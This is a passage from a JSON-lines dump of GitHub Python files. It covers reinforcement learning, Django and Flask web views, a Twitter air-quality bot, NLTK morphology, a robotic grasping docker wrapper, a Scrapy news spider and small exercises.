self.target_critic[target_agent], tau=self.tau)\n\n total_value_loss += value_loss.item()\n total_policy_loss += policy_loss.item()\n\n if self.step % self.decay_step == 0:\n if self.eps > self.eps_min:\n self.eps *= self.eps_decay\n else:\n self.eps = self.eps_min\n self.step += 1\n\n return total_policy_loss / self.n_agents, total_value_loss / self.n_agents, self.eps\n\n def write(self, reward, policy_loss, value_loss):\n wandb.log({'Reward': reward,\n 'Actor Loss': policy_loss, 'Critic Loss': value_loss})\n\n def __str__(self):\n return \"MADDPG\"","repo_name":"dbsxodud-11/Multi-Agent-RL","sub_path":"algorithms/MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"11676656105","text":"from h5py import File\nfrom matplotlib.pyplot import *\n\nfh = File('series/series_s1.h5','r')\n\nt = fh['scales/sim_time'][:]\n\nke = fh['tasks/ke'][:,0,0]\nens = fh['tasks/enstrophy'][:,0,0]\n\nfig,ax = subplots()\n\nplot (t,ke)\nplot (t,ens)\n\nshow()","repo_name":"gvn22/k-flow","sub_path":"plot_series.py","file_name":"plot_series.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24429965054","text":"#!/usr/bin/env python3\n\"\"\"\nIn math, the factorial of a number is defined as the product of an integer and all the integers below it. For example, the factorial of four (4!) is equal to 1*2*3*4=24.\nLet's make the factorial function return the right number.\n\"\"\"\ndef factorial(n):\n result = 1\n for i in range (1,n+1):\n result = result * i\n return result\n\nprint(factorial(10)) # should be 3628800\nprint(factorial(2)) # should be 2\nprint(factorial(7)) # should be 5040","repo_name":"phuongvo9/python-google-automation-","sub_path":"crash-course/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31751429477","text":"import random as rd\nimport numpy as np\nimport copy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nfrom sim.heroes import Team, Hero\nfrom sim.processing import Game\n\nheroes = [Hero.__dict__[key] for key in Hero.__dict__ if '__' not in key and 'empty' not in key]\nranks = [32, 23, 18, 20, 7, 5,\n 38, 4, 33, 19, 11, 29, 2,\n 9, 3, 37, 8, 40, 31,\n 13, 21, 17, 41, 24, 27,\n 35, 39, 25, 22, 6, 16,\n 26, 14, 1, 15, 12, 36,\n 34, 28, 30, 10]\nn_heroes = len(heroes)\n\n\ndef get_random_team():\n return Team([rd.choice(heroes)() for _ in range(6)])\n\n\nmodel = Sequential()\nmodel.add(Dense(32, input_dim=6 * n_heroes, activation='sigmoid'))\nmodel.add(Dense(n_heroes, activation='sigmoid'))\nmodel.compile(loss='mse', optimizer='adam', metrics=['mae'])\n\n\ndef get_next_hero(model, eps, state, actions):\n if rd.random() < eps:\n a = rd.randint(0, n_heroes - 1)\n while a in actions:\n a = rd.randint(0, n_heroes - 1)\n else:\n scores = model.predict(state)[0]\n scores[actions] = 0\n a = np.argmax(scores)\n\n return a\n\n\ndef train_model(model, n_battles=10000, mode='vs_self', eps=0.5, decay=0.9998):\n scores = []\n for i in range(n_battles):\n actions = []\n op_actions = []\n state = np.zeros((1, 6 * n_heroes))\n op_state = np.zeros((1, 6 * n_heroes))\n eps *= decay\n if i % 100 == 0:\n print(\"Battle {} of {}\".format(i + 1, n_battles))\n\n for turn in range(6):\n a = get_next_hero(model, eps, state, actions)\n op_a = get_next_hero(model, eps, op_state, op_actions)\n actions.append(a)\n op_actions.append(op_a)\n\n if turn < 5:\n new_state = copy.copy(state)\n new_state[0][n_heroes * turn + a] = 1\n new_op_state = copy.copy(op_state)\n new_op_state[0][n_heroes * turn + op_a] = 1\n target = np.max(np.delete(model.predict(new_state)[0], actions))\n op_target = np.max(np.delete(model.predict(new_op_state)[0], op_actions))\n\n else:\n team = Team([heroes[a]() for a in actions])\n if mode == 'vs_self':\n op_team = Team([heroes[op_a]() for op_a in op_actions])\n elif mode == 'vs_random':\n op_team = get_random_team()\n else:\n raise Warning('Unknown training mode')\n game = Game(team, op_team)\n game.process()\n target = (game.winner + 1) / 2\n op_target = 1 - target\n\n target_vec = model.predict(state)[0]\n target_vec[actions[-1]] = target\n model.fit(state, target_vec.reshape((1, n_heroes)), epochs=1, verbose=0)\n\n if mode == 'vs_self':\n op_target_vec = model.predict(op_state)[0]\n op_target_vec[op_actions[-1]] = op_target\n model.fit(op_state, op_target_vec.reshape((1, n_heroes)), epochs=1, verbose=0)\n\n state = new_state\n op_state = new_op_state\n\n scores.append(sum([ranks[a] for a in actions + op_actions]))\n\n return scores\n\n\ndef get_prediction(model):\n actions = []\n state = np.zeros((1, 6 * n_heroes))\n for turn in range(6):\n scores = model.predict(state)[0]\n scores[actions] = 0\n a = np.argmax(scores)\n actions.append(a)\n state[0][n_heroes * turn + a] = 1\n\n return Team([heroes[a]() for a in actions])\n","repo_name":"Ashargin/SimTapTap","sub_path":"rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"72430839169","text":"import logging\n\nfrom rest_framework import generics, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom core.apps.common.common_functions import pillar_response\nfrom core.apps.common.enums.service_enum import ServiceType\nfrom core.apps.common.utils import (\n get_user,\n get_user_from_session_destroy_session_variable,\n get_user_metadata,\n log_extra_fields,\n make_context,\n update_user_metadata_cache,\n)\nfrom core.apps.user_auth.models import UserAuthModel\nfrom core.apps.user_profile.models import UserActivityLog\n\nfrom ...enums.notification_type_enum import NotificationTypeEnum\nfrom ...models import PushNotificationLog\nfrom ...services import (\n DeactivateInAppNotificationService,\n InAppNotificationSevice,\n NotificationPanelService,\n NotificationService,\n PushNotificationService,\n PushNotificationSettingService,\n create_notification,\n get_user_notification,\n get_user_notification_list,\n update_user_notification,\n)\nfrom .serializers import UserNotificationSerializer\n\nlogger = logging.getLogger(__name__)\n\n\nclass NotificationView(APIView):\n # Create Notifications\n def post(self, request):\n logger.info(f\"Got request to send notifications {request.data}\")\n\n user_code = request.data.get(\"user_code\")\n payment = request.data.get(\"payment\", None)\n notification_type_enum_code = request.data.get(\"notification_type_enum_code\")\n notification_title = request.data.get(\"notification_title\")\n notification_message = request.data.get(\"notification_message\")\n data = request.data.get(\"data\")\n try:\n user_auth = UserAuthModel.objects.filter(\n is_active=True, code=user_code\n ).last()\n create_notification(\n user_auth=user_auth,\n notification_type_enum=NotificationTypeEnum.get_notification_type_enum_from_code(\n notification_type_enum_code\n ),\n notification_title=notification_title,\n notification_message=notification_message,\n data=data,\n payment=payment,\n )\n error, msg, data = False, \"Created notifications successfully\", None\n except Exception as e:\n logger.info(f\" Exception occurs = {e}\")\n error, msg, data = (\n True,\n \"Unable to create notifications, Please check server log\",\n None,\n )\n\n return Response(make_context(error=error, message=msg, data=data))\n\n\nclass UserNotificationView(generics.GenericAPIView):\n serializer_class = UserNotificationSerializer\n\n def get(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n error, msg, data = get_user_notification(user)\n\n return Response(make_context(error, msg, data))\n\n def post(self, request, notification_id):\n user = get_user_from_session_destroy_session_variable(request)\n error, msg, data = update_user_notification(user, notification_id, request)\n\n return Response(make_context(error, msg, data))\n\n\nclass SyncView(APIView):\n activity_code = UserActivityLog.ActivityCode.SYNC_INIT\n\n @pillar_response(activity_code)\n def post(self, request):\n \"\"\"Sync user actions view\"\"\"\n\n user_id = request.session[\"user_id\"]\n\n # try:\n # user_actions = sync_user_actions(user)\n # except Exception as e:\n # logger.error(f\"Could not sync user actions. Exception: {str(e)}\")\n user_actions = []\n\n user_metadata = get_user_metadata(user_id)\n\n if user_metadata:\n logger.info(f\"found user meta data for {user_id}\")\n user_metadata_hash = user_metadata.hash\n response = dict(\n user_metadata_hash=user_metadata_hash,\n actions=user_actions,\n cache_id=user_metadata.cache_id,\n )\n else:\n response = dict(\n user_metadata_hash=None,\n actions=user_actions,\n cache_id=0,\n )\n return response\n\n\nclass SyncUpdateView(APIView):\n @pillar_response()\n def post(self, request):\n user_id_list = request.data.get(\"user_id_list\", [])\n update_user_metadata_cache(user_id_list)\n\n\nclass PushNotificationAcknowledgeView(APIView):\n def post(self, request, push_notification_id):\n \"\"\"Push notification acknowledgement view\"\"\"\n\n user = get_user_from_session_destroy_session_variable(request)\n\n try:\n user_push_notification = PushNotificationLog.objects.get(\n user_auth=user, id=push_notification_id\n )\n except PushNotificationLog.DoesNotExist:\n error, msg, data = True, \"No notification found with the id\", None\n else:\n user_push_notification.notification_status = (\n PushNotificationLog.NotificationStatus.ACKNOWLEDGED\n )\n user_push_notification.save(\n update_fields=[\"notification_status\", \"updated_at\"]\n )\n\n error, msg, data = False, \"\", None\n\n return Response(make_context(error, msg, data))\n\n\nclass PushNotificationView(APIView):\n def post(self, request):\n \"\"\"Push notification view\"\"\"\n\n user_id = request.session[\"user_id\"]\n try:\n user_auth = UserAuthModel.objects.filter(code=user_id).last()\n PushNotificationService(\n user_auth\n ).send_push_notification_from_other_service(request)\n response = make_context(False, \"Successfully sent push notification\", None)\n except Exception as e:\n message = \"Failed to send push notification\"\n logger.exception(\n \"Failed to send push notification\",\n extra=log_extra_fields(\n request_url=request.path,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n user_id=user_id,\n ),\n )\n response = make_context(True, message, None)\n return Response(response)\n\n\nclass NewNotificationView(APIView):\n def post(self, request):\n \"\"\"Notification view\"\"\"\n\n user_id = request.session[\"user_id\"]\n try:\n NotificationService(user_id).create_notification(request)\n response = make_context(False, \"Successfully created notification\", None)\n except Exception as e:\n message = \"Failed to send push notification\"\n logger.exception(\n \"Failed to send push notification\",\n extra=log_extra_fields(\n request_url=request.path,\n exception_message=str(e),\n service_type=ServiceType.API.value,\n user_id=user_id,\n ),\n )\n response = make_context(True, message, None)\n return Response(response)\n\n\nclass DeviceTokenView(APIView):\n def post(self, request):\n \"\"\"Store or update user device token\"\"\"\n\n user_id = request.session[\"user_id\"]\n user_auth = UserAuthModel.objects.filter(code=user_id).last()\n\n old_token = request.data.get(\"old_token\", None)\n new_token = request.data.get(\"new_token\", None)\n token_type = request.data.get(\"token_type\", \"\").lower()\n\n PushNotificationSettingService(\n user_auth=user_auth, user_id=user_id\n ).update_push_notification_setting(token_type, old_token, new_token)\n\n error, msg, data = False, \"Device token saved successfully\", None\n return Response(make_context(error, msg, data))\n\n\nclass NotificationListView(APIView):\n def get(self, request):\n user = get_user_from_session_destroy_session_variable(request)\n last_id = int(request.GET.get(\"last_id\", 0))\n\n try:\n notification_list = get_user_notification_list(user, last_id)\n response = make_context(\n False, \"Notification list returned successfully\", notification_list\n )\n status_code = status.HTTP_200_OK\n except Exception as e:\n logger.exception(\n f\"Failed to return notification list where previous page \"\n f\"last notification id: {last_id}\",\n extra=log_extra_fields(\n service_type=ServiceType.API.value,\n exception_message=str(e),\n user_id=user.code,\n user_auth_id=user.id,\n request_url=request.path,\n ),\n )\n response = make_context(True, \"Could not return notification list\", None)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return Response(response, status=status_code)\n\n\nclass InAppNotificationView(APIView):\n @pillar_response()\n def get(self, request):\n \"\"\"get all in app notification list\"\"\"\n notification_data = InAppNotificationSevice(request).get_notification_list()\n return notification_data\n\n @pillar_response()\n def post(self, request):\n \"\"\"create new in app notification\"\"\"\n return InAppNotificationSevice(request).create_notification()\n\n @pillar_response()\n def patch(self, request):\n \"\"\"update in app notification action\"\"\"\n InAppNotificationSevice(request).update_notification()\n\n @pillar_response()\n def delete(self, request):\n \"\"\"deactivate in app notification\"\"\"\n InAppNotificationSevice(request).deactivate_notification()\n\n\nclass NotificationPanelView(APIView):\n @pillar_response()\n def get(self, request):\n \"\"\"get notification data\"\"\"\n panel_data = NotificationPanelService(\n user_id=get_user(request=request)\n ).get_notification_panel_data()\n return panel_data\n\n\nclass DeactivateInAppNotificationView(APIView):\n @pillar_response()\n def post(self, request):\n \"\"\"deactivate in app notification\"\"\"\n data = DeactivateInAppNotificationService(request).deactivate_notification()\n return data\n","repo_name":"yass-arafat/code-samples","sub_path":"core/apps/notification/api/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34251878549","text":"from flask import Blueprint, flash, redirect, url_for\nfrom src.models.user import requires_login\n\npayment_blueprint = Blueprint('payments', __name__)\n\n\n@payment_blueprint.route('/success')\n@requires_login\ndef payment_successful():\n flash(\"Your payment was successful!\", \"green\")\n return redirect(url_for('credits.index'))\n\n\n@payment_blueprint.route('/cancelled')\n@requires_login\ndef payment_cancelled():\n flash(\"Your payment was cancelled!\", \"yellow\")\n return redirect(url_for('credits.index'))\n","repo_name":"r3sdev/pricewatch","sub_path":"src/views/payments.py","file_name":"payments.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33339309499","text":"from logging import info, basicConfig, INFO\nfrom threading import Thread\nfrom time import sleep\nimport concurrent.futures\n\n\ndef thread_function(name):\n info(f\"Thread {name} starting... \")\n sleep(2)\n info(f\"Thread {name} stopped... \")\n\n\nformat = \"%(asctime)s: %(message)s\"\nbasicConfig(format=format, level=INFO, datefmt=\"%h:%M:%S\")\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n #executor.map(thread_function, range(3))\n for x in range(3):\n executor.submit(thread_function,x)\nprint('done')\n","repo_name":"vbmchik/pythin","sub_path":"day31/day31_9.py","file_name":"day31_9.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20691082913","text":"\n\nimport tweepy as twitter\nimport requests\nimport asyncio\nimport time\nimport json\nimport keys\nimport re\n\ncity = ''\naqual = None\nerror_msg = None\n\ndef get_data():\n new_data = None\n response = requests.get(\n f'http://api.waqi.info/feed/{city}/?token={keys.API_TOKEN}')\n data = response.text\n parse_json = json.loads(data)\n # print(parse_json['status'], 'here')\n if parse_json['status'] == 'error':\n err_reply()\n elif parse_json['status'] == 'ok':\n for key in parse_json.keys():\n if key == 'data':\n new_data = (key, parse_json[key])\n aqual = new_data[1]['aqi']\n return aqual\n\n \nauth = twitter.OAuthHandler(keys.api_key, keys.api_secret)\nauth.set_access_token(keys.access_token, keys.access_token_secret)\napi = twitter.API(auth, wait_on_rate_limit=True)\n\nFILE = \"id.txt\"\n\nwhile True:\n def retrieve_id(file):\n f_read = open(file, \"r\")\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\n def store_id(id, file):\n f_write = open(file, \"w\")\n f_write.write(str(id))\n f_write.close()\n return\n\n def reply():\n api.update_status(\n (f'@{mention.user.screen_name} PM2.5 Air Quality Index in {city} is currently {aqual} '), mention.id)\n print('Replied to @ ' + mention.user.screen_name)\n\n def err_reply():\n print('there was an error')\n api.update_status(\n (f'@{mention.user.screen_name} It seems there was touble retrieving data for the city of {city} '), mention.id)\n print('Replied to @ ' + mention.user.screen_name)\n\n last_seen_id = retrieve_id(FILE)\n mentions = api.mentions_timeline(last_seen_id, tweet_mode=\"extended\")\n\n for mention in reversed(mentions):\n if \"airqual\" in mention.full_text:\n last_seen_id = mention.id\n store_id(last_seen_id, FILE)\n tweet = (mention.full_text)\n clean_tweet = re.sub(\"@[A-Za-z0-9_]+\", \"\", tweet)\n clean_tweet = re.sub(\"#[A-Za-z0-9_]+\", \"\", clean_tweet)\n clean_tweet = re.sub(\"''[A-Za-z0-9_]+\", \"\", clean_tweet)\n clean_tweet = clean_tweet.lower()\n clean_tweet = clean_tweet.replace(\" \", \"\")\n clean_tweet = \" \".join(clean_tweet.split())\n # logic to sort location for api search params go here\n city = clean_tweet\n print(city)\n # logic for conditional rendering of error msg or aqual here\n aqual = get_data()\n if aqual != None:\n print(f'{aqual} for {city}')\n reply()\n \n\n print(\"sleeping\")\n time.sleep(30)\n print('awake')","repo_name":"Iffat77/aqbot","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74502950532","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\nfrom nltk.corpus import wordnet\n\nlemmatiseur = WordNetLemmatizer()\nstemmer = PorterStemmer()\n\n\ndef wordnet_pos(treebank_tag):\n if treebank_tag.startswith('J'): return wordnet.ADJ\n if treebank_tag.startswith('V'): return wordnet.VERB\n if treebank_tag.startswith('N'): return wordnet.NOUN\n if treebank_tag.startswith('R'): return wordnet.ADV\n return ''\n\n\ndef analyse_morphologique(mot, tag):\n lemme = lemmatiseur.lemmatize(mot, pos=tag)\n racine = stemmer.stem(mot)\n return {\"mot\": mot, \"lemme\": lemme, \"racine\": racine}\n\n\ntext = \"don't father's parents' birds flies knives being flying lovely axes glasses given greatest faster lovelier \" \\\n \"mashed bathed accessed\"\ntokens = text.split(\" \")\ntagged = nltk.pos_tag(tokens)\nfor token, tag in tagged:\n print(analyse_morphologique(token, wordnet_pos(tag)))","repo_name":"valentinRieu/NLP-with-Python","sub_path":"examples/morpho_winograd_nltk.py","file_name":"morpho_winograd_nltk.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12791515849","text":"from django.http import HttpResponse\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.forms import UserCreationForm,AuthenticationForm\nfrom django.contrib.auth import authenticate,login\nfrom django.views.generic import View\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.db.models import Q,F\nfrom django.contrib.auth import logout\n\nfrom datetime import timedelta\nimport datetime\n\nimport re\n\nfrom uinfo.models import *\nfrom uinfo.attrmixin import *\nfrom .models import RudnikModel\n\nclass rudnikPage(GetUserInfo,View):\n def get(self,request,*args,**kwargs):\n uid = request.user.id # ид авторизованного пользователя\n logic_data = super(rudnikPage, self)\n context = logic_data.UserStat(uid) # Статы\n getRudnikLevel = UserAttribute.objects.filter(user_id = uid).only('rudnik_level')\n for r in getRudnikLevel:\n rLevel = r.rudnik_level\n context['rudnikLevel']=rLevel\n\n totalBonus = 10\n \n if rLevel<=5:\n totalBonus+=rLevel*1\n context['TotalBonus'] = totalBonus\n elif rLevel >=6 and rLevel <=10:\n totalBonus+=(rLevel-5)*2+4\n elif rLevel >=11 and rLevel <=15:\n totalBonus+=(rLevel-10)*3+14\n elif rLevel >=16 and rLevel <=19:\n totalBonus+=(rLevel-15)*5+39\n \n \n context['TotalBonus']=totalBonus\n #Получить цену на апгрейд\n getNextUpRudnik = RudnikModel.objects.filter(RudnikLevel = rLevel+1)\n if not getNextUpRudnik:\n context['DoneRudnik']= True\n else:\n for b in getNextUpRudnik:\n RudnikPrice = b.RudnikPrice\n #context['totalBonus'] = b.\n context['link'] = b.RudnikLevel # ссылка\n context['price'] = b.RudnikPrice\n context['bonus'] = b.RudnikBonus\n \n \n infoAboutTime = UserAttribute.objects.filter(user_id=uid)\n for t in infoAboutTime:\n if not t.last_accept_rudnik:\n UserAttribute.objects.filter(user_id=uid).update(last_accept_rudnik=datetime.date.today())\n else:\n if t.last_accept_rudnik < datetime.date.today():\n UserAttribute.objects.filter(user_id=uid).update(last_accept_rudnik=datetime.date.today())\n UserAttribute.objects.filter(user_id=uid).update(knights=F('knights')+totalBonus)\n messages.add_message(request, messages.INFO, \"Собрали кнайты\")\n return redirect('rudnikPage')\n\n\n\n\n return render(request,'rudnik.html',context)\n\nclass UpRudnik(get_user_info,View):\n def post(self,request,RudnikLevel,*args,**kwargs):\n uid = request.user.id # ид авторизованного пользователя\n logic_data = super(UpRudnik, self)\n\n listUserStat = logic_data.get_list_stat(uid)\n Userknights = listUserStat['knights']\n\n getRudnikLevel = UserAttribute.objects.filter(user_id = uid).only('rudnik_level')\n for r in getRudnikLevel:\n rLevel = r.rudnik_level\n\n getNextUpRudnik = RudnikModel.objects.filter(RudnikLevel = rLevel+1)\n if not getNextUpRudnik:\n pass\n else:\n for b in getNextUpRudnik:\n RudnikPrice = b.RudnikPrice\n UpPrice = b.RudnikPrice\n \n if Userknights >= RudnikPrice:\n UserAttribute.objects.filter(user_id=uid).update(knights=F('knights')-RudnikPrice,rudnik_level=F('rudnik_level')+1)\n messages.add_message(request, messages.INFO, \"Прокачали рудник\")\n return redirect('rudnikPage')\n else:\n messages.add_message(request, messages.INFO, \"Не хватает валюты\")\n return redirect('rudnikPage')\n\n\n\n\n\n","repo_name":"val1n0r/mayar","sub_path":"rudnik/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13797546346","text":"import os\nimport os.path as path\n\ndef calc_grasping_point(rgb_path, depth_path, result_txt_path='./grasping_result.txt', result_image_path=None, docker_container='gqcnn'):\n workspace = '/root/Workspace'\n deeplab = path.join(workspace, 'pytorch-deeplab-xception')\n gqcnn = path.join(workspace, 'gqcnn') \n\n work_rgb_path = path.join(workspace, 'sample_rgb.jpg')\n work_depth_path = path.join(workspace, 'sample_depth.npy')\n work_depth_mask_path = path.join(workspace, 'sample_depth_mask.npy')\n work_segmask_path = path.join(workspace, 'sample_segmask.jpg')\n work_result_txt_path = path.join(workspace, 'sample_grasping_result.txt')\n work_result_image_path = path.join(workspace, 'sample_grasp.jpg')\n\n print(rgb_path, docker_container, work_rgb_path)\n os.system('docker cp {} {}:{}'.format(\n rgb_path, docker_container, work_rgb_path\n ))\n os.system('docker cp {} {}:{}'.format(\n depth_path, docker_container, work_depth_path\n ))\n\n os.system('docker exec -it -w {} {} python3 test.py --in-path {} --depth-path {}'.format(\n deeplab, docker_container, work_rgb_path, work_depth_path\n ))\n\n os.system('docker exec -it -w {} {} python3 examples/policy.py GQCNN-4.0-PJ --depth_image {} --segmask {} --camera_intr data/calib/phoxi/phoxi.intr > /dev/null'.format(\n gqcnn, docker_container, work_depth_mask_path, work_segmask_path\n ))\n\n os.system('docker cp {}:{} {}'.format(\n docker_container, work_result_txt_path, result_txt_path\n ))\n if result_image_path != None:\n os.system('docker cp {}:{} {}'.format(\n docker_container, work_result_image_path, result_image_path\n ))\n\n return parse_txt_file(result_txt_path)\n\ndef parse_txt_file(txt_path):\n data = open(txt_path).read()\n data = data.strip().split('\\n')\n data = [parse_line(d) for d in data]\n return dict(data)\n\ndef parse_line(line):\n name, value = line.split(' : ')\n name = ''.join(name.split(' ')[1:])\n if name == 'depth':\n value = value.replace('m', '')\n value = eval(value)\n return (name, value)\n\nif __name__ == '__main__':\n rgb_path = 'sample/ham2_nip_snap_rgb_0.jpg'\n depth_path = 'sample/ham2_nip_snap_depth_0.npy'\n \n txt_path = 'sample/grasping_result.txt'\n image_path = 'sample/grasping_result.jpg' # option. default=None\n docker_container = 'gqcnn' # option. default='gqcnn'\n grasping_point = calc_grasping_point(rgb_path, depth_path, txt_path, result_image_path=image_path, docker_container=docker_container)\n print(grasping_point)\n","repo_name":"TMmichi/vrep_jaco","sub_path":"rl_controller/scripts/cip_data/gqcnn.py","file_name":"gqcnn.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28007366346","text":"\nfrom hydra.utils import instantiate\nfrom pytorch_lightning import LightningModule\nimport torch\nfrom torch import nn\n\nfrom omegaconf import OmegaConf\n\n\nclass DenseNet(LightningModule):\n\n def __init__(self, in_dim, hidden_dims, out_dim, optimizer_cfg=None):\n super().__init__()\n self.save_hyperparameters()\n\n self.in_dim = in_dim\n self.hidden_dims = OmegaConf.to_container(hidden_dims)\n self.out_dim = out_dim\n self.optimizer_cfg = optimizer_cfg\n\n self.layer_sizes = [self.in_dim] + self.hidden_dims + [self.out_dim]\n self.layers = []\n for i in range(len(self.layer_sizes)-1):\n self.layers.append(nn.Linear(self.layer_sizes[i], self.layer_sizes[i+1]))\n\n self.net = nn.Sequential(*self.layers)\n self.softmax = nn.Softmax(dim=1)\n\n self.loss_fn = nn.CrossEntropyLoss()\n\n def configure_optimizers(self):\n return instantiate(self.optimizer_cfg, params=self.parameters())\n\n def forward(self, x):\n logits = self.net(x)\n return logits\n\n def training_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n\n if self.trainer.global_step % 50 == 0:\n self.logger.experiment.add_scalar(\"train_loss_step\", loss, self.trainer.global_step)\n\n return {\"loss\": loss}\n\n def training_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"train_loss_epoch\", avg_loss, self.trainer.current_epoch)\n\n def validation_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n self.log(\"val_loss\", loss)\n return {\"loss\": loss}\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"val_loss_epoch\", avg_loss, self.trainer.current_epoch)\n\n def test_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n self.log(\"test_loss\", loss)\n return {\"loss\": loss}\n\n def test_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"test_loss_epoch\", avg_loss, self.trainer.current_epoch)\n","repo_name":"jwspaeth/ml_template","sub_path":"src/models/DenseNet.py","file_name":"DenseNet.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8672824747","text":"import scrapy\nfrom scrapy.http import HtmlResponse\nfrom parser_trend.items import ParserTrendItem\n\n\nclass LentaRuSpider(scrapy.Spider):\n name = \"lenta_ru\"\n allowed_domains = [\"lenta.ru\"]\n start_urls = [\"https://lenta.ru/parts/news/\"]\n\n def parse(self, response:HtmlResponse): \n \n news_links = response.xpath(\"//li[@class='parts-page__item']/a/@href\").getall()\n\n for news_link in news_links:\n yield response.follow(news_link, callback=self.news_parse) \n print(f'\\n######################\\nParsing the current page: {response.url}\\n######################\\n')\n\n next_page = response.xpath(\"//a[@class='loadmore js-loadmore']/@href\").get() \n if next_page != \"/parts/news/4/\": # ограничиваем глубину страниц для поиска\n # если следующая страница 4, то паук напишет что текущая страница будет последней для парсинга\n # и последняя страница, которую пропарсит паукт будет 3-ей (так как не предыдущей странице, паук\n # понимает какая будет следующая)\n yield response.follow(next_page, callback=self.parse) \n else:\n print('\\n**********************\\nThis page is last for parsing\\n**********************\\n')\n \n #print(f'\\n######################\\n{next_page}\\n######################\\n')\n\n def news_parse(self, response:HtmlResponse):\n news_name=response.xpath(\"//div[@class='topic-body _news']/h1/span/text()\").getall()[0] \n news_link = response.url\n date_time=response.xpath(\"//a[contains(@class, 'topic-header__time')]/text()\").get().split(\",\")\n news_time=date_time[0]\n news_date=date_time[1] \n #pass\n\n yield ParserTrendItem(\n name=news_name, \n time=news_time,\n date=news_date,\n link=news_link\n \n )","repo_name":"kutsman/Data_collection_and_processing","sub_path":"parser_trend/parser_trend/spiders/lenta_ru.py","file_name":"lenta_ru.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27964921016","text":"import sys\n\nsys.setrecursionlimit(10 ** 6)\nstdin = sys.stdin\n\nni = lambda: int(ns())\nna = lambda: list(map(int, stdin.readline().split()))\nns = lambda: stdin.readline().strip()\n\nK, N = na()\nA = na()\nmax_l = 0\ntotal = 0\nfor i in range(N - 1):\n max_l = max(max_l, A[i + 1] - A[i])\n total += A[i + 1] - A[i]\nprint(K - max(max_l, K - total))\n","repo_name":"tonko2/AtCoder","sub_path":"abc/160/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33562227113","text":"from django.db import models\n\nfrom sorl.thumbnail import get_thumbnail\nfrom sorl.thumbnail.fields import ImageField\n\nfrom ..base import models as kk\nfrom ..places.models import Place\n\n\nclass LogoMixin(models.Model):\n logo = models.ImageField(\n verbose_name = 'Логотип',\n upload_to = 'images/logos',\n blank = True\n )\n\n# def thumb(self):\n# return get_thumbnail(self.image, '80x60', crop = 'center')\n\n class Meta:\n abstract = True\n\n\nclass Entity(kk.Base):\n\n name = models.CharField(\n verbose_name = 'Название',\n max_length = 120\n )\n\n open = models.BooleanField(\n verbose_name = 'Открыто',\n help_text = 'Снимите флажок, если организация не функционирует',\n default = True\n )\n\n\n# place = models.OneToOneField(\n# Place,\n# on_delete = models.PROTECT,\n# verbose_name = 'место нахождения',\n# related_name = 'entities',\n# related_query_name = 'entity',\n# blank = True,\n# null = True,\n# editable = False,\n## unique = True, # OneToOneField\n# )\n\n def __str__(self):\n return '{name} ({type})'.format(\n name = self.name,\n type = self.get_type_display(),\n )\n\n class Meta:\n abstract = True\n ordering = ('name', )\n verbose_name = 'Организация'\n verbose_name_plural = 'Все 